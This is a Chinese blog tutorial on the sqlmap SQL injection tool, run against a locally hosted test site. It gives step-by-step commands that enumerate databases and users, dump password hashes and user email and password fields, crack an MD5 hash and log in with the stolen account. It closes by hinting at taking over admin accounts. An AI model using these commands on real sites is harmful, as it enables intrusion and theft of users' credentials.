渗透测试工具sqlmap基础教程

最新推荐文章于 2023-12-18 16:46:21 发布
最新推荐文章于 2023-12-18 16:46:21 发布
阅读量324 收藏 2
点赞数
分类专栏: 网络安全

转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493

作者:羽龍飛


 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。

>

>

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。


既然本文是基础教程,以下只写工具的基本使用方法。

本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。


测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。


教程开始:

一、检测注入点是否可用

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"  
参数:

-u:指定注入点url

结果:



注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000


其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch  

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs  

参数:

--dbs:dbs前面有两条杠,请看清楚。

结果:


结果显示该sqlserver中共包含7个可用的数据库。


三、web当前使用的数据库

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db  

四、web数据库使用账户

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user  


五、列出sqlserver所有用户

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users  

六、数据库账户与密码

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords  

七、列出数据库中的表

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables  
参数:

-D:指定数据库名称

--tables:列出表

结果:



结果体现共列出了34张表。


八、列出表中字段

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns  

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:


结果显示该userb表中包含了23条字段。


九、暴字段内容

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump  
参数:

-C :指定要暴的字段

--dump:将结果导出

结果:


如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

[plain]  view plain  copy
  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump  
参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:




十、验证结果

通过上图结果看到其中的一个用户信息为:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456


拿到账号密码我们来测试是否可以登录,登录结果如下:


验证成功!

当然我们只是拿到普通会员账号进行登录,你也可以拿到管理员账号进行登录,后面的事情自己发挥吧,嘿嘿!

sd_cx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
termux-wifi
01-31
termux-wifi
SQLMAP教程,零基础入门到精通,一篇就够了!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-18 1064
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
SQL注入的测试
weixin_39901032的博客
11-06 2330
一.SQL注入的简单理解 SQL注入是通过web客户端,通过用户输入数据输入,插入或‘注入’部分或完整的SQL语句。一次成功的SQL注入攻击可以读取数据库中的敏感数据、修改数据库(插入、删除、更新),在数据库上执行管理操作等。本质上,SQL注入是一种注入攻击,其SQL命令被注入到数据平台中,以影响预期的SQL命令执行。 一般来说,编写web应用的程序员会把SQL语句与用户输入数据结合在一起: eg...
SQL注入检测工具及方法,黑客零基础入门
白帽子凯哥聊黑客
12-18 1243
SQL注入检测是通过各种手段来识别和验证应用程序是否容易受到SQL注入攻击的方法。
SQL注入---测试工程师必知必会
啊Sei的博客
06-02 1814
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程.docx
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap渗透工具
07-06
sqlmap渗透工具,需要python环境,需要相关使用命令可以看我的博客
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
使用LINUX系统DDOS攻击WINDOWS服务器
rubilly的专栏
10-09 1806
使用当下最有名的REDHAT LINUX进 行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最有名的DDOS攻击工具 TFN2K LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000 SERVER 服务开有APACHE2 FTP VNC关系不大,主要攻击APACHE 0.解压 tar -zxvf tfn2k.tgz 1.安装TFN2K TFN2K为开放原
利用map传参进行增删改查的操作
Thanks__的博客
04-25 414
对于需要进行增删改查,但是没有封装的实体类的一些表该如何操作 ps:这仅仅是众多方法中的一个如有(不对的地方还请各位大佬多多指正) 假设这是我们需要修改的字段,但是目前F58H0411和F58H0401是没有封装的实体类的 public int updateBatchTdpSoOffline(TdpSo tdpSo, TdpSoOffline[] tdpSoOfflines, String po_Qty2Flg, String... paras) { // 表头信息 int rtn = tdpSoM
使用Termux安装黑客工具箱---Lazymux
两个月亮
10-16 1万+
使用Termux安装黑客工具箱---lazymux, git使用
Sqlmap安装及使用
qq_52358808的博客
08-27 2981
Sqlmap概述安装简单使用 概述 sqlmap 是一个开源的渗透测试工具,可以用来进行自动化检测,利用 SQL 注入漏洞,获取数据库服 务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获 取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 地址:https://github.com/sqlmapproject/sqlmap 安装 输入以下指令出现此界面即安装成功 python sqlmap.py -h 简单使用 sqlmap -
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
Sqlmap参数详解
gao646467783的博客
11-21 741
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
渗透测试-SQL注入之sqlmap的使用方法及实战案例
lza20001103的博客
07-19 3376
渗透测试-SQL注入之sqlmap的使用方法及实战案例
kali工具sqlmap的使用教程
09-06
Kali工具sqlmap是一款用于自动化检测和利用SQL注入漏洞的工具。使用sqlmap可以帮助安全研究人员和渗透测试人员快速发现和利用网站中存在的SQL注入漏洞。 使用sqlmap的步骤如下: 1. 首先,你需要在Kali Linux系统上安装sqlmap工具。Kali Linux是一款专为渗透测试和网络安全而设计的操作系统,sqlmap是其中的一个内置工具。你可以使用命令"apt-get install sqlmap"来安装sqlmap工具。 2. 在安装完成后,你可以使用命令"sqlmap -u URL"来指定要测试的目标URL。这个URL应该是一个包含SQL注入漏洞的网站页面。sqlmap将会对该URL进行检测,以确定是否存在SQL注入漏洞。 3. 如果sqlmap检测到目标URL存在SQL注入漏洞,它将会显示出注入点的位置。你可以使用命令"sqlmap -u URL --dbs"来获取目标数据库的信息。这个命令将会列出所有的数据库名称。 4. 接下来,你可以使用命令"sqlmap -u URL -D database_name --tables"来获取目标数据库中的所有表名。这个命令将会列出所有的表名。 5. 一旦你获取到了目标数据库中的表名,你可以使用命令"sqlmap -u URL -D database_name -T table_name --columns"来获取指定表中的所有列名。这个命令将会列出指定表中的所有列名。 6. 最后,你可以使用命令"sqlmap -u URL -D database_name -T table_name -C column_name --dump"来获取指定列中的数据。这个命令将会列出指定列中的所有数据。 请注意,为了保护目标网站的安全和合法性,你需要在授权的情况下使用sqlmap工具进行SQL注入测试。同时,你也应该遵守法律法规和道德规范,在进行任何渗透测试活动时要遵循合法和合规的原则。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [kali基于sqlmap的使用](https://blog.csdn.net/qq_53123067/article/details/124447705)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Kali使用手册top10工具part2](https://download.csdn.net/download/yifan2dj/8031897)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值